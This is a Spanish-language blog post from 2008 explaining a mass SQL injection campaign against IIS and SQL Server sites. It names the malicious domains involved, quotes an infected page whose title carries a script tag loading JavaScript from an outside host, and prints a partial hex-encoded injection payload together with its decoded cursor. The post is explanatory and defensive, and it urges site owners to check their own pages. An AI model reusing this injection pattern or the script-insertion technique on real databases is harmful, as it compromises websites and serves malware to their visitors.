Ataque masivo de Inyección SQL

112 views

Apareció una noticia en Security Magazine y VirusBulletin de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.

Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea.

Ejercicio sencillo de Comprobación:
Si buscan en Google por "script src http nmidahena.com" o "script src http nihaorr1.com", encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen "Ver Código Fuente" para que observen el código de la página web. Una vez hecho esto, buscan por "nmidahena, aspder o nihaorr1"; Vale la pena que chequen los suyos, espero no se lleven una sorpresa.

Por ejemplo, el sitio "http://www.sssri.com/websiteenglish/default.asp" aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio "nmidahena.com":

PLAIN TEXT
HTML:
  3. <meta http-equiv=Content-Type content=text/html; charset=gb2312>
  4. <title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
  5. <script language=javascript>
  6. function JumpDef()
  7. {
  8. window.location.href="../home.htm";
  9. }
  10. </script>

Lo unico bueno es que estos ataques solo estan dirigidos a sitios con Microsoft IIS con backend de Microsoft SQL SERVER segun http://www.f-secure.com/ el codigo inicia asi(ojo este codigo no esta completo):

PLAIN TEXT
SQL:
  1. DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
  2.    4C00410052004500200040005400200076006100720063006800610072
  3.    00280032003500350029002C0040004300200076006100720063006800
  4.    610072002800320035003500290020004400450043004C004100520045
  5.    0020005400610062006C0065005F0043007500720073006F0072002000
  6.    43005500520053004F005200200046004F0052002000730065006C0065
  7.    0063007400200061002E006E0061006D0065002C0062002E006E006100
  8.    6D0065002000660072006F006D0020007300790073006F0062006A0065
  9.    00630074007300200061002C0073007900730063006F006C0075006D00
  10.    6E00730020006200200077006800650072006500200061002E00690064
  11.    003D0062002E0069006400200061006E006400200061002E0078007400
  12.    7900700065003D00270075002700200061006E0064002000280062002E
  13.    00780074007900700065003D003900390020006F007200200062002E00
  14.    780074007900700065003D003300350020006…

El cual al momento de ser decodificado resulta en:

PLAIN TEXT
SQL:
  1. DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
  2.    CURSOR FOR select a.name'b.name FROM sysobjects a'syscolumns b
  3.    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
  4.    or b…

Lo que se obtiene es que encuentra los campos de tipo texto en la base de datos y agrega un link al javascript malicioso a todos y cada uno de ellos lo que causara que los desplieguen automaticamente.
Esencialmente los atacantes buscan paginas ASO o ASPX conteniendo cualquier tipo de querystring e intentan utilizarlo para hacer el upload de su codigo de insercion de SQL.

Si te gusto este post y te sientes dadivoso,Invitame un cafe



Este articulo lo escribí el dia 26, 04, 2008 a las 7:48 pm y lo tengo guardadito en
N/A.
Puedes checar comentarios nuevos de este articulo suscribiendote con este link RSS 2.0 .
Tus comentarios son importantes Deja tu comentario, o trackback desde tu sitio.

Responder